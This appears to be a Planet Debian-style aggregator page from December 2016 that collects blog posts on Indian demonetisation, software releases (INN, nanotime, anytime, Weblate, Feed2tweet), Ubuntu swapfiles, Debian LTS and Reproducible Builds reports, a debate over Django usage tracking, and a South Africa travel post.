Demonetisation, Indian state and world

Queues get longer, patience runs out- Copyright Indian Express Group.

Queues get longer, patience runs out- Copyright Indian Express Group.

I dunno if people heard or didn’t hear about the demonetisation of INR 500 and INR 1000 which happened in India on 8th November 2016 with new currency designed in India of INR 2000 and INR 500.

What they did was from that moment onwards, paper currency of INR 500 and INR 1000 notes were declared invalid except few places (Government Hospitals, Petrol Pumps, Booking of Air and Train tickets) . The reasons given were as –

a. End of corruption – There is/was suspicion that there are people who have loads of unaccounted wealth which they keep in the form of Cash in hand,

b. Charge against fake/duplicate currency – There is/was suspicion that quite a bit of the money esp, high value notes such as INR 500 and INR 1000, so having made them illegal, people had to hand over cash to banks and fake money would go outside the system.

c. Terror funding – This is related with the above point. There is a popular theory/myth/fact that terrorists use fake money to buy people, arms and ammunition while further devaluing the value of INR against dollar and basket of other high-value currencies that Indian currency follows/bases itself on.

Each of these theories/myths/facts has been contested. Every day we are seeing and reading reports of people being caught with new currency in absurd numbers while RBI , our central bank and Lender of Last Resort has had to play multiple roles such as policing along with the country’s Income Tax Department as well as pumping in new notes of the NEW INR 2000/- and INR 500/- into ATM’s and Bank branches around the country.

Now while the above may seem to be reasonable, there have been multiple factors which has made the whole exercise less effective while implementing –

a. Banking reach – While India does and can boast of somewhat good indicators of banking reach . But –

Quarter of these accounts were opened only in the last couple of years under the ‘Pradhan Mantri Jan Dhana Yojana‘.

There are quite a few limitations of such accounts. It is a good scheme as if you develop a good rapport with a bank and show good credit/debit understanding then there is possibility to move to normal full-fledged bank account.

Almost all of these accounts had zero-balances till the demonetization move.

Many of these accounts are suspected to have been conduits to convert black money to white as the Govt. had said it will not scrutinize small savings bank accounts.

Also many bank accounts historically have laid dormant over the years. One of my first jobs was of a data entry operator in a bank and I used to see hundreds of bank accounts lying dormant for years together. This was in bank digitization in early 90s.

Small Savings accounts would not be scrutinized if they bring upto INR 250000 while Jan Dhan accounts have an upper limit of only INR 50000 .

Even then, it has lead to a huge surge in balances specifically in Zero balances account.

What begs the question is if it is their hard-earned money why hadn’t they deposited money before 8th November 2016.

While I can’t speak about them, I can certainly speak about myself. I hardly keep at the most INR INR 5/10K for medical emergencies in-house for number of years.

Unless you are a businessman who has need of cash or have some function, nobody that I know would keep such amounts in their homes, simply for the possibility of theft in homes.

So how did such people who are not able to open a full-fledged saving account get access to such large amounts?

In most public sector banks, to have a full-fledged savings account the only requirements are –

a. Have INR 500 to 1000 as balance at all times.
b. Have permanent identity and residential proof
c. Two photographs
d. 2-3 people who are account holders who can act as guarantor.

Of the above, b. and d. are probably sticking points for most migrants, while d. may be a sticking point for labourers, craftsman etc. hence the need for that specific scheme.

Which leads to the natural suspicion that they may have been white-washing somebody’s untaxed, unaccounted money which is being put into bank and made into legitimate white money.

People do not have to file an Income Tax Return (ITR) unless they earn more than 250,000 in a single financial year.

One good off-shot of the scheme though is the transparency gained about Bank Mitras

b. Number of banks, quality of Bank services, number of people per bank at least in Nationalized Banks leaves much to be desired. We can’t even try to compare with other BRIC countries, leave alone Germany.

Mobile ATM - Copyright - PTI

Mobile ATM – Copyright – PTI

One another positive off-shoot has been the introduction of Mobile ATM Vans around the country.

I had experienced such vans in Mumbai since ages, but not anywhere else.

I do hope that both Bank Mitras as well as such ‘Van Mobile ATMs’ happen more. There are huge swathes of people who are currently unbanked. Getting them into the banking infrastructure, getting them to *think* about taking rational financial decisions, i.e. saving and spending, different types of saving etc. should not make citizens and the banking systems more productive and efficient, but hopefully improves our GDP and make it more resilient to any outside financial shocks.

c. Many bank websites have everything in English. That norm needs to change.

I do have few queries though, one of the countries who is supposed to be a prominent supporter and user of ‘cashless’ society is supposed to be Canada. Could any Canadians (also because debconf is going to happen in Canada in 2017) share how and if they had seen the Canadian banking system evolve in their country ?

Also how much of Canada’s economy is cashless i.e used to Electronic Money Transfer and other means (but not cash) and how much is cash, more in day-to-day usage and transactions. I am trying to get people’s perspective rather than some website which may serve only raw numbers, although even that would be appreciable.

Also what, if any charges/commission are paid to a Canadian bank for paying via card/electronic money transfer. I ask as India has reduced charges overall to 1% from 2% for making transactions upto INR 2000 in a day.

There has also been recent talk of plastic notes instead of paper currency. Plastic notes are supposed to be more copy-proof and also will work for much longer time. They will not soil as paper notes do.

How have countries been looking at Plastic currencies. I do suspect there would be issues while destroying plastic money vis-a-vis paper currencies.

A sort of interesting discussion that I had with Bernelle before venturing into South Africa was asking her about monetary transactions in SA. She had replied that the highest denomination notes was 200 ZAR which is roughly equal to ( ZAR 200 x 5 = INR 1000) . What is/was interesting that Bernelle told me to be careful and as far as possible not to show 200 ZAR note, whereas in India, even the cheapest worker I have met, they have seen and used INR 1000 note. The context of the discussion was being safe in South Africa and doing transactions with people around as to what works.

It would be curiouser to know how things work in Canada for instance ?

Also has Canada or any other country have experimented with plastic notes. If yes, how has the experience been ?

I would have to say this is in no way a definitive guide of the different impressions and repercussion that the decision and the way it’s playing out even now.

Another thing, while researching for the article there were lots of interesting knowledge, for e.g. the Big Mac Index and it’s limitations which I didn’t know how to integrate into the decision and Policy taken. I also came to know/saw that lots of Policy initiatives being taken by the current (NDA)Government is similar to initiatives taken elsewhere in the world..

Whether the Policy would be fruitful in getting the desired outcome or would it lead to more chaos and down-turn will know in next quarter only.

It would be nice and interesting if people have observed something similar in their country’s economic policies as well.


Filed under: Miscellenous Tagged: #Bank Mitra, #Bank reach, #blackmoney, #debconf17, #Demonetisation, #fake currencies, #full-fledged savings account, #Jan Dhan scheme, #Moile ATM Van, #Plastic money, #Public Sector Banks (PSB), #Reserve Bank of India, Big Mac Index

17 December, 2016 09:19PM by shirishag75

Russ Allbery

INN 2.6.1

(As usual, Julien finished this release a bit back, and then I got busy with life stuff and haven't gotten the announcement out.)

This is a bug-fix and minor feature release over INN 2.6.0. The biggest change is adding support for the new COMPRESS extension. It also fixes various bugs around state changes when negotiating various compression or integrity layers and fixes some issues with nnrpd's validation of newly-posted messages. (Messages with Received and Posted headers are no longer rejected; messages with all-whitespace headers now are.) This release also supports OpenSSL 1.1.0 and fixes an nntpsend bug under systemd.

As always, thanks to Julien ÉLIE for preparing this release and doing most of the maintenance work on INN!

You can get the latest version from the official ISC download page or from my personal INN pages. The latter also has links to the full changelog and the other INN documentation.

17 December, 2016 08:42PM

December 16, 2016

Dimitri John Ledkov

Swapfiles by default in Ubuntu

4MB RAM card
By default, in Ubuntu, we usually create a swap partition.

Back in the day of 4MB RAM cards this made total sense, as the ration of RAM to disk space, was still very low. Things have changed since. Server, desktop, embedded systems have migrated to newer generations of both RAM and persistent storage. On the high performance side of things we see machines with faster storage in the form of NVMe and SSD drives. Reserving space for swap on such storage, can be seen as expensive and wasteful. This is also true for recent enough laptops and desktops too. Mobile phones have substantial amounts of RAM these days, and at times, coupled with eMMC storage - it is flash storage of lower performance, which have limited number of write cycles, hence should not be overused for volatile swap data. And there are also unicorns in a form of high performance computing of high memory (shared memory) systems with little or no disk space.

Today, carving a partition and reserving twice the RAM size for swap makes little sense. For a common, general, machine most of the time this swap will not be used at all. Or if said swap space is in use but is of inappropriate size, changing it in-place in retrospect is painful.

Starting from 17.04 Zesty Zapus release, instead of creating swap partitions, swapfiles will be used by default for non-lvm based installations.

Secondly, the sizing of swapfiles is very different. It is no more than 5% of free disk space or 2GiB, whichever is lower.

For preseeding, there are two toggles that control this behavior:
  • d-i partman-swapfile/percentage string 5
  • d-i partman-swapfile/size string 2048
Setting either of those to zero, will result in system without any swap at all. And one can tweak relative integer percentage points and absolute limits in integer percentage points or MiB.

On LVM based installations, swap logical volumes are used, since unfortunately LVM snapshots do not exclude swapfile changes. However, I would like to move partman-auto to respect the above proposed 5%-or-2GB limits.

Ps. 4MB RAM card picture is by Bub's (Photo) [GFDL or CC-BY-SA-3.0], via Wikimedia Commons

16 December, 2016 11:30AM by Dimitri John Ledkov ([email protected])

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

nanotime 0.0.1: New package for Nanosecond Resolution Time for R

R has excellent tools for dates and times. The Date and POSIXct classes (as well as the 'wide' representation in POSIXlt) are versatile, and a lot of useful tooling has been built around them.

However, POSIXct is implemented as a double with fractional seconds since the epoch. Given the 53 bits accuracy, it leaves just a bit less than microsecond resolution. Which is good enough for most things.

But more and more performance measurements, latency statistics, ... are now measured more finely, and we need nanosecond resolution. For which commonly an integer64 is used to represent nanoseconds since the epoch.

And while R does not a native type for this, the bit64 package by Jens Oehlschlägel offers a performant one implemented as a lightweight S3 class. So this package uses this integer64 class, along with two helper functions for parsing and formatting, respectively, at nano-second resolution from the RcppCCTZ package which wraps the CCTZ library from Google. CCTZ is a modern C++11 library extending the (C++11-native) chrono type.

Examples

Simple Parsing and Arithmetic

R> x <- nanotime("1970-01-01T00:00:00.000000001+00:00")
R> print(x)
integer64
[1] 1
R> format(x)
[1] "1970-01-01T00:00:00.000000001+00:00"
R> cat("x+1 is: ")
x+1 is: R> x <- x + 1
R> print(x)
integer64
[1] 2
R> format(x)
[1] "1970-01-01T00:00:00.000000002+00:00"
R>

Vectorised

R> options("width"=60)
R> v <- nanotime(Sys.time()) + 1:5
R> v
integer64
[1] 1481505724483583001 1481505724483583002
[3] 1481505724483583003 1481505724483583004
[5] 1481505724483583005
R> format(v)
[1] "2016-12-12T01:22:04.483583001+00:00"
[2] "2016-12-12T01:22:04.483583002+00:00"
[3] "2016-12-12T01:22:04.483583003+00:00"
[4] "2016-12-12T01:22:04.483583004+00:00"
[5] "2016-12-12T01:22:04.483583005+00:00"
R> 

Use with zoo

R> z <- zoo(cbind(A=1:5, B=5:1), v)
R> options("nanotimeFormat"="%d %b %H:%M:%E*S")  ## override default
R> z
                          A B
12 Dec 01:47:55.812513001 1 5
12 Dec 01:47:55.812513002 2 4
12 Dec 01:47:55.812513003 3 3
12 Dec 01:47:55.812513004 4 2
12 Dec 01:47:55.812513005 5 1
R> 

Technical Details

The bit64 package (by Jens Oehlschlägel) supplies the integer64 type used to store the nanosecond resolution time as (positive or negative) offsets to the epoch of January 1, 1970. The RcppCCTZ package supplies the formatting and parsing routines based on the (modern C++) library CCTZ from Google.

Status

Version 0.0.1 has now been released. It works with some other packages, notably zoo and data.table.

It (at least currently) requires RcppCCTZ to parse and format nanosecond resolution time objects from / to text --- and this package is on Linux and OS X only due to its use of system time zoneinfo. The requirement could be relaxed in the future by rewriting formating and parsing code. Contributions are welcome.

Installation

The package is not yet on CRAN. Until it gets there, or to install the development versions, it can also be installed via a standard

install.packages("RcppCCTZ")   # need 0.1.0 or later
remotes::install_github("eddelbuettel/nanotime")  

If you prefer install.packages() (as I do), use the version from the ghrr drat:

install.packages("drat")       # easier repo access + creation
drat:::add("ghrr")             # make it known
install.packages("nanotime")   # install it

If and when it gets to CRAN you will be able to do

install.packages("nanotime")

Contact

For questions or comments use the issue tracker off the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

16 December, 2016 11:28AM

hackergotchi for Raphaël Hertzog

Raphaël Hertzog

Freexian’s report about Debian Long Term Support, November 2016

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 150 work hours have been dispatched among 14 paid contributors. Their reports are available:

Evolution of the situation

The number of sponsored hours did not change this month and in fact we haven’t had any new sponsor since September. We still need a couple of supplementary sponsors to reach our objective of funding the equivalent of a full time position.

The security tracker currently lists 40 packages with a known CVE and the dla-needed.txt file 36. We don’t seem to really catch up the small backlog. The reasons are not clear but I noticed that there are a few packages that take a lot of time due to the number of issues found with fuzzers. We also handle many issues that the security team ends up classifying as not worth an update because we add the package to dla-needed.txt before the security team has done its review and nobody checks afterwards.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

16 December, 2016 09:43AM by Raphaël Hertzog

hackergotchi for Michal Čihař

Michal Čihař

wlc 0.7

wlc 0.7, a command line utility for Weblate, has been just released. There are several new commands like translation file download or statistics fetching.

Full list of changes:

  • Added reset operation.
  • Added statistrics for project.
  • Added changes listing.
  • Added file downloads.

wlc is built on API introduced in Weblate 2.6 and still being in development, you need Weblate 2.10 for some feature (already available on our hosting offering). You can find usage examples in the wlc documentation.

Filed under: Debian English phpMyAdmin SUSE Weblate | 2 comments

16 December, 2016 09:15AM

hackergotchi for Steve Kemp

Steve Kemp

A simple Perl alternative to storing data in Redis

I continue to be a big user of Perl, and for many of my sites I avoid the use of MySQL which means that I largely store data in flat files, SQLite databases, or in memory via Redis.

One of my servers was recently struggling with RAM, and the suprising cause was "too much data" in Redis. (Surprising because I'd not been paying attention and seen how popular it was, and also because ASCII text compresses pretty well).

Read/Write speed isn't a real concern, so I figured I'd move the data into an SQLite database, but that would require rewriting the application.

The client library for Perl is pretty awesome, and simple usage looks like this:

# Connect to localhost.
my $r = Redis->new()

# simple storage
$r->set( "key", "value" );

# Work with sets
$r->sadd( "fruits", "orange" );
$r->sadd( "fruits", "apple" );
$r->sadd( "fruits", "blueberry" );
$r->sadd( "fruits", "banannanananananarama" );

# Show the set-count
print "There are " . $r->scard( "fruits" ) . " known fruits";

# Pick a random one
print "Here is a random one " . $r->srandmember( "fruits" ) . "\n";

I figured, if I ignored the Lua support and the other more complex operations, creating a compatible API implementation wouldn't be too hard. So rather than porting my application to using SQLite directly I could juse use a different client-library.

In short I change this:

use Redis;
my $r = Redis->new();

To this:

use Redis::SQLite;
my $r = Redis::SQLite->new();

And everything continues to work. I've implemented all the set-related functions except one, and a random smattering of the other simple operations.

The appropriate test-cases in the Redis client library (i.e. removing all references to things I didn't implement) pass, and my own new tests also make me confident.

It's obviously not a hard job, but it was a quick solution to a real problem and might be useful to others.

My image hosting site, and my markdown sharing site now both use this wrapper and seem to be performing well - but with more free RAM.

No doubt I'll add more of the simple primitives as time goes on, but so far I've done enough to be useful.

16 December, 2016 06:42AM

December 15, 2016

Reproducible builds folks

Reproducible Builds: week 85 in Stretch cycle

What happened in the Reproducible Builds effort between Sunday December 4 and Saturday December 10 2016:

Toolchain development and fixes

Anders Kaseorg opened a pull request to asciidoc upstream, to make it generate reproducible documentation. (#782294)

Bugs filed

Chris Lamb:

Clint Adams:

Dafydd Harries:

Robbie Harwood:

Valerie R Young:

Reviews of unreproducible packages

47 package reviews have been added, 84 have been updated and 3 have been removed in this week, adding to our knowledge about identified issues.

1 new issue type has been added: lessc_captures_build_path

Weekly QA work

During our reproducibility testing, some FTBFS bugs have been detected and reported by:

  • Chris Lamb (8)

diffoscope development

Chris Lamb fixed a division-by-zero in the progress bar, split out trydiffoscope into a separate package, and made some performance enhancements. Maria Glukhova fixed build issues with Python 3.4

strip-nondeterminism development

Anders Kaseorg added support for .par files, by allowing them to be treated as Zip archives; and Chris Lamb improved some documentation.

reprotest development

Ximin Luo added the ability to vary the build time using faketime, as well as other code quality improvements and cleanups.

He also discovered a little-known fact about faketime - that it also modifies filesystem timestamps by default. He submitted a PR to libfaketime upstream to improve the documentation on this, which was quickly accepted, and also disabled this feature in reprotest's own usage of faketime.

buildinfo.debian.net development

There was further work on buildinfo.debian.net code. Chris Lamb added support for buildinfo format 0.2 and made rejection notices clearer; and Emanuel Bronshtein fixed some links to use HTTPS.

Misc.

This week's edition was written by Ximin Luo and reviewed by a bunch of Reproducible Builds folks on IRC and via email.

15 December, 2016 02:35PM

Jamie McClelland

Should we be pushing OpenPGP?

Bjarni Rúnar, the author of Mailpile released a blog about recent blogs disparaging OpenPGP. It's a good read.

There's one reason to support OpenPGP missing from the blog: OpenPGP protects you if your mail server is hacked. I'm sure that Debbie Wasserman Schultz wishes she had been using OpenPGP.

Having said all of this... OpenPGP didn't make my recent list of security tips. That ommission is for two reasons:

  • I've never trusted my phone enough to store my OpenPGP keys on it. However, now that I am encrypting my data partition on the phone, should I re-consider? I use the K-9 email client which has had OpenPGP support for years, should I recommend that other people use K-9 and upload their keys to their phones? Suggesting that people use OpenPGP without the ability to use it on your phone seems like an empty suggestion. What about OpenPGP on the iPhone?
  • I'm waiting for Mailiple 1.0 to be released so I have a viable suggestion for how people can start using encryption now on their desktops. The complexity of using Thunderbird with Enigmail (and the uncertain future of Thunderbird) make it a hard sell. Should I re-consider? What about Mailvelope? Should I be encouraging people to use Mailvelope with their Gmail, etc. accounts?

15 December, 2016 01:56PM

hackergotchi for Michal Čihař

Michal Čihař

Weblate 2.10

Quite on the schedule, Weblate 2.10 is out today. This release brings Git exporter module, improves support for machine translation services and adds various CSV exports and API interfaces.

Full list of changes:

  • Added quality check to check whether plurals are translated differently.
  • Fixed GitHub hooks for repositories with authentication.
  • Added optional Git exporter module.
  • Support for Microsoft Cognitive Services Translator API.
  • Simplified project and component user interface.
  • Added automatic fix to remove control chars.
  • Added per language overview to project.
  • Added support for CSV export.
  • Added CSV download for stats.
  • Added matrix view for quick overview of all translations
  • Added basic API for changes and units.
  • Added support for Apertium APy server for machine translations.

If you are upgrading from older version, please follow our upgrading instructions.

You can find more information about Weblate on https://weblate.org, the code is hosted on Github. If you are curious how it looks, you can try it out on demo server. You can login there with demo account using demo password or register your own user. Weblate is also being used on https://hosted.weblate.org/ as official translating service for phpMyAdmin, OsmAnd, Aptoide, FreedomBox, Weblate itself and many other projects.

Should you be looking for hosting of translations for your project, I'm happy to host them for you or help with setting it up on your infrastructure.

Further development of Weblate would not be possible without people providing donations, thanks to everybody who have helped so far! The roadmap for next release is just being prepared, you can influence this by expressing support for individual issues either by comments or by providing bounty for them.

Filed under: Debian English phpMyAdmin SUSE Weblate | 0 comments

15 December, 2016 01:30PM

December 14, 2016

Carl Chenet

Feed2tweet 0.8, tool to post RSS feeds to Twitter, released

Feed2tweet 0.8, a self-hosted Python app to automatically post RSS feeds to the Twitter social network, was released this December, 14th.

With this release Feed2tweet now smartly manages the hashtags, adding as much as possible given the size of the tweet.

Also 2 new options are available :

  • –populate-cache to retrieve the last entries of the RSS feeds and store them in the local cache file without posting them on Twitter
  • –rss-sections to display available sections in the RSS feed, allowing to use these section names in your tweet format (see the official documentation for more details)

Feed2tweet 0.8  is already in production for Le Journal du hacker, a French-speaking Hacker News-like website, LinuxJobs.fr, a French-speaking job board and this very blog.

fiesta

What’s the purpose of Feed2tweet?

Some online services offer to convert your RSS entries into Twitter posts. Theses services are usually not reliable, slow and don’t respect your privacy. Feed2tweet is Python self-hosted app, the source code is easy to read and you can enjoy the official documentation online with lots of examples.

Twitter Out Of The Browser

Have a look at my Github account for my other Twitter automation tools:

  • Retweet , retweet all (or using some filters) tweets from a Twitter account to another one to spread content.
  • db2twitter, get data from SQL database (several supported), build tweets and send them to Twitter
  • Twitterwatch, monitor the activity of your Twitter timeline and warn you if no new tweet appears

What about you? Do you use tools to automate the management of your Twitter account? Feel free to give me feedback in the comments below.

14 December, 2016 11:00PM by Carl Chenet

Antoine Beaupré

Django debates privacy concern

In recent years, privacy issues have become a growing concern among free-software projects and users. As more and more software tasks become web-based, surveillance and tracking of users is also on the rise. While some software may use advertising as a source of revenue, which has the side effect of monitoring users, the Django community recently got into an interesting debate surrounding a proposal to add user tracking—actually developer tracking—to the popular Python web framework.

Tracking for funding

A novel aspect of this debate is that the initiative comes from concerns of the Django Software Foundation (DSF) about funding. The proposal suggests that "relying on the free labor of volunteers is ineffective, unfair, and risky" and states that "the future of Django depends on our ability to fund its development". In fact, the DSF recently hired an engineer to help oversee Django's development, which has been quite successful in helping the project make timely releases with fewer bugs. Various fundraising efforts have resulted in major new Django features, but it is difficult to attract sponsors without some hard data on the usage of Django.

The proposed feature tries to count the number of "unique developers" and gather some metrics of their environments by using Google Analytics (GA) in Django. The actual proposal (DEP 8) is done as a pull request, which is part of Django Enhancement Proposal (DEP) process that is similar in spirit to the Python Enhancement Proposal (PEP) process. DEP 8 was brought forward by a longtime Django developer, Jacob Kaplan-Moss.

The rationale is that "if we had clear data on the extent of Django's usage, it would be much easier to approach organizations for funding". The proposal is essentially about adding code in Django to send a certain set of metrics when "developer" commands are run. The system would be "opt-out", enabled by default unless turned off, although the developer would be warned the first time the phone-home system is used. The proposal notes that an opt-in system "severely undercounts" and is therefore not considered "substantially better than a community survey" that the DSF is already doing.

Information gathered

The pieces of information reported are specifically designed to run only in a developer's environment and not in production. The metrics identified are, at the time of writing:

  • an event category (the developer commands: startproject, startapp, runserver)
  • the HTTP User-Agent string identifying the Django, Python, and OS versions
  • a user-specific unique identifier (a UUID generated on first run)

The proposal mentions the use of the GA aip flag which, according to GA documentation, makes "the IP address of the sender 'anonymized'". It is not quite clear how that is done at Google and, given that it is a proprietary platform, there is no way to verify that claim. The proposal says it means that "we can't see, and Google Analytics doesn't store, your actual IP". But that is not actually what Google does: GA stores IP addresses, the documentation just says they are anonymized, without explaining how.

GA is presented as a trade-off, since "Google's track record indicates that they don't value privacy nearly as high" as the DSF does. The alternative, deploying its own analytics software, was presented as making sustainability problems worse. According to the proposal, Google "can't track Django users. [...] The only thing Google could do would be to lie about anonymizing IP addresses, and attempt to match users based on their IPs".

The truth is that we don't actually know what Google means when it "anonymizes" data: Jannis Leidel, a Django team member, commented that "Google has previously been subjected to secret US court orders and was required to collaborate in mass surveillance conducted by US intelligence services" that limit even Google's capacity of ensuring its users' anonymity. Leidel also argued that the legal framework of the US may not apply elsewhere in the world: "for example the strict German (and by extension EU) privacy laws would exclude the automatic opt-in as a lawful option".

Furthermore, the proposal claims that "if we discovered Google was lying about this, we'd obviously stop using them immediately", but it is unclear exactly how this could be implemented if the software was already deployed. There are also concerns that an implementation could block normal operation, especially in countries (like China) where Google itself may be blocked. Finally, some expressed concerns that the information could constitute a security problem, since it would unduly expose the version number of Django that is running.

In other projects

Django is certainly not the first project to consider implementing analytics to get more information about its users. The proposal is largely inspired by a similar system implemented by the OS X Homebrew package manager, which has its own opt-out analytics.

Other projects embed GA code directly in their web pages. This is apparently the option chosen by the Oscar Django-based ecommerce solution, but that was seen by the DSF as less useful since it would count Django administrators and wasn't seen as useful as counting developers. Wagtail, a Django-based content-management system, was incorrectly identified as using GA directly, as well. It actually uses referrer information to identify installed domains through the version updates checks, with opt-out. Wagtail didn't use GA because the project wanted only minimal data and it was worried about users' reactions.

NPM, the JavaScript package manager, also considered similar tracking extensions. Laurie Voss, the co-founder of NPM, said it decided to completely avoid phoning home, because "users would absolutely hate it". But NPM users are constantly downloading packages to rebuild applications from scratch, so it has more complete usage metrics, which are aggregated and available via a public API. NPM users seem to find this is a "reasonable utility/privacy trade". Some NPM packages do phone home and have seen "very mixed" feedback from users, Voss said.

Eric Holscher, co-founder of Read the Docs, said the project is considering using Sentry for centralized reporting, which is a different idea, but interesting considering Sentry is fully open source. So even though it is a commercial service (as opposed to the closed-source Google Analytics), it may be possible to verify any anonymity claims.

Debian's response

Since Django is shipped with Debian, one concern was the reaction of the distribution to the change. Indeed, "major distros' positions would be very important for public reception" to the feature, another developer stated.

One of the current maintainers of Django in Debian, Raphaël Hertzog, explicitly stated from the start that such a system would "likely be disabled by default in Debian". There were two short discussions on Debian mailing lists where the overall consensus seemed to be that any opt-out tracking code was undesirable in Debian, especially if it was aimed at Google servers.

I have done some research to see what, exactly, was acceptable as a phone-home system in the Debian community. My research has revealed ten distinct bug reports against packages that would unexpectedly connect to the network, most of which were not directly about collecting statistics but more often about checking for new versions. In most cases I found, the feature was disabled. In the case of version checks, it seems right for Debian to disable the feature, because the package cannot upgrade itself: that task is delegated to the package manager. One of those issues was the infamous "OK Google" voice activation binary blog controversy that was previously reported here and has since then been fixed (although other issues remain in Chromium).

I have also found out that there is no clearly defined policy in Debian regarding tracking software. What I have found, however, is that there seems to be a strong consensus in Debian that any tracking is unacceptable. This is, for example, an extract of a policy that was drafted (but never formally adopted) by Ian Jackson, a longtime Debian developer:

Software in Debian should not communicate over the network except: in order to, and as necessary to, perform their function[...]; or for other purposes with explicit permission from the user.

In other words, opt-in only, period. Jackson explained that "when we originally wrote the core of the policy documents, the DFSG [Debian Free Software Guidelines], the SC [Social Contract], and so on, no-one would have considered this behaviour acceptable", which explains why no explicit formal policy has been adopted yet in the Debian project.

One of the concerns with opt-out systems (or even prompts that default to opt-in) was well explained back then by Debian developer Bas Wijnen:

It very much resembles having to click through a license for every package you install. One of the nice things about Debian is that the user doesn't need to worry about such things: Debian makes sure things are fine.

One could argue that Debian has its own tracking systems. For example, by default, Debian will "phone home" through the APT update system (though it only reports the packages requested). However, this is currently not automated by default, although there are plans to do so soon. Furthermore, Debian members do not consider APT as tracking, because it needs to connect to the network to accomplish its primary function. Since there are multiple distributed mirrors (which the user gets to choose when installing), the risk of surveillance and tracking is also greatly reduced.

A better parallel could be drawn with Debian's popcon system, which actually tracks Debian installations, including package lists. But as Barry Warsaw pointed out in that discussion, "popcon is 'opt-in' and [...] the overwhelming majority in Debian is in favour of it in contrast to 'opt-out'". It should be noted that popcon, while opt-in, defaults to "yes" if users click through the install process. [Update: As pointed out in the comments, popcon actually defaults to "no" in Debian.] There are around 200,000 submissions at this time, which are tracked with machine-specific unique identifiers that are submitted daily. Ubuntu, which also uses the popcon software, gets around 2.8 million daily submissions, while Canonical estimates there are 40 million desktop users of Ubuntu. This would mean there is about an order of magnitude more installations than what is reported by popcon.

Policy aside, Warsaw explained that "Debian has a reputation for taking privacy issues very serious and likes to keep it".

Next steps

There are obviously disagreements within the Django project about how to handle this problem. It looks like the phone-home system may end up being implemented as a proxy system "which would allow us to strip IP addresses instead of relying on Google to anonymize them, or to anonymize them ourselves", another Django developer, Aymeric Augustin, said. Augustin also stated that the feature wouldn't "land before Django drops support for Python 2", which is currently estimated to be around 2020. It is unclear, then, how the proposal would resolve the funding issues, considering how long it would take to deploy the change and then collect the information so that it can be used to spur the funding efforts.

It also seems the system may explicitly prompt the user, with an opt-out default, instead of just splashing a warning or privacy agreement without a prompt. As Shai Berger, another Django contributor, stated, "you do not get [those] kind of numbers in community surveys". Berger also made the argument that "we trust the community to give back without being forced to do so"; furthermore:

I don't believe the increase we might get in the number of reports by making it harder to opt-out, can be worth the ill-will generated for people who might feel the reporting was "sneaked" upon them, or even those who feel they were nagged into participation rather than choosing to participate.

Other options may also include gathering metrics in pip or PyPI, which was proposed by Donald Stufft. Leidel also proposed that the system could ask to opt-in only after a few times the commands are called.

It is encouraging to see that a community can discuss such issues without heating up too much and shows great maturity for the Django project. Every free-software project may be confronted with funding and sustainability issues. Django seems to be trying to address this in a transparent way. The project is willing to engage with the whole spectrum of the community, from the top leaders to downstream distributors, including individual developers. This practice should serve as a model, if not of how to do funding or tracking, at least of how to discuss those issues productively.

Everyone seems to agree the point is not to surveil users, but improve the software. As Lars Wirzenius, a Debian developer, commented: "it's a very sad situation if free software projects have to compromise on privacy to get funded". Hopefully, Django will be able to improve its funding without compromising its principles.

Note: this article first appeared in the Linux Weekly News.

14 December, 2016 04:15PM

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

anytime 0.1.2: Another bugfix

Another update, now at release 0.1.2, of anytime arrived at CRAN earlier today.

anytime is a very focused package aiming to do just one thing really well: to convert anything in integer, numeric, character, factor, ordered, ... format to either POSIXct or Date objects -- and to do so without requiring a format string.

See the anytime page, or the GitHub README.md for a few examples, or just consider the following illustration:

R> library(anytime)
R> anytime("20161107 202122")   ## all digits
[1] "2016-11-07 20:21:22 CST"
R> utctime("2016Nov07 202122")  ## UTC parse example
[1] "2016-11-07 14:21:22 CST"
R> 

Release 0.1.2 addresses a somewhat bizarre Windows-only bug reported at GitHub in #33 and at StackOverflow. Formats of the %Y-%b-%d form, ie 2016-Dec-12 for today would fail on Windows as the contiguous string was apparently getting split by a routine looking for splits on spaces. Really strange.

Anyway, I switched to using more helper functions from the Boost String Algorithms library, and things are behaving now. An extra shoutout once more to Gábor Csárdi and the R Consortium for the most awesome R-Builder. I was able to test and fix on Windows during the weekend with no access to an actual windows environment.

The NEWS file summarises the release:

Changes in anytime version 0.1.2 (2016-12-13)

  • The (internal) string processing and splitting now uses Boost algorithm functions which avoids a (bizarre) bug on Windows.

  • Test coverage was increased.

Courtesy of CRANberries, there is a comparison to the previous release. More information is on the anytime page.

For questions or comments use the issue tracker off the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

14 December, 2016 02:00AM

December 13, 2016

hackergotchi for Shirish Agarwal

Shirish Agarwal

Eagle Encounters, pier Stellenbosch

Before starting, have to say hindsight as they say is always 20/20. I was moaning about my 6/7 hour trip few blog posts back but now came to know about the 17.5 hr. flights (17.5x800km/hr=14000 km.) which are happening around me.

I would say I was whining about nothing seeing those flights. I can’t even imagine how people would feel in those flights. Six hours were too much in the tin-can, thankfully though I was in the aisle seat. In 14 hours most people would probably give to Air rage .

I just saw an excellent article on the subject. I also came to know that seat-selection and food on a long-haul flights are a luxury, hence that changes the equation quite a bit as well. So on these facts, it seems Qatar Airways treated me quite well as I was able to use both those options.

Disclaimer – My knowledge about birds/avian is almost non-existent, Hence feel free to correct me if I do go wrong anywhere.

Coming back to earth literally😉 , I will have to share a bit of South Africa as that is part and parcel of what I’m going to share next. Also many of the pictures shared in this particular blog post belong to KK who has shared them with me with permission to share it with the rest of the world.

When I was in South Africa, in the first couple of days as well as what little reading of South African History I had read before travelling, had known that the Europeans, specifically the Dutch ruled on South Africa for many years.

What was shared to me in the first day or two that ‘Afrikaans‘ is mostly spoken by Europeans still living in South Africa, some spoken by the coloured people as well. This tied in with the literature I had already read.

The Wikipedia page shares which language is spoken by whom and how the demographics play out if people are interested to know that.

One of the words or part of the word for places we came to know is ‘bosch’ as is used in many a places. ‘Bosch‘ means wood or forest. After this we came to know about many places which were known as ‘somethingbosch’ which signified to us that area is or was a forest.

